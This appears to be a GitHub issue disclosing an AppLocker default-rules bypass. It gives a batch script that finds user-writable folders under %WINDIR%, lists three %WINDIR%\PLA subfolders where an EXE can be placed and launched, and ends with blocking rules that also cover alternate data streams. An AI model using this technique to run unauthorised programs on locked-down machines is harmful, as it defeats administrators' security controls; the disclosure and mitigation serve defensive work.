2025 AppLocker Default Rules Bypass - Using the %WINDIR%\PLA DirectoryΒ #23
Description
Using a basic script I wrote to discover writable directories by a basic user, I was able to enumerate a directory that was not mentioned
in the UltimateAppLockerByPassList (https://github.com/api0cradle/UltimateAppLockerByPassList)
Here is my script:
@echo off
setlocal enabledelayedexpansion
set "root_path=%windir%"
for /d /r "%root_path%" %%F in (*) do (
set "folder=%%F"
>nul 2>&1 (echo. > "%%F\test_write.txt") && (
echo %%F - Writable
del "%%F\test_write.txt"
)
)
endlocal
It outputted that 3 subfolders that are writable and bypass the default execution rules.
%WINDIR%\PLA\reports*
%WINDIR%\PLA\rules*
%WINDIR%\PLA\Templates*
You can smuggle an EXE in there and launch it regularly.
How to Prevent:
Create 6 Applocker rules to block the following so it covers ADS
%WINDIR%\PLA\reports*
%WINDIR%\PLA\rules*
%WINDIR%\PLA\Templates*
%WINDIR%\PLA\reports:*
%WINDIR%\PLA\rules:*
%WINDIR%\PLA\Templates:*
Date of Discovery: 2/17/25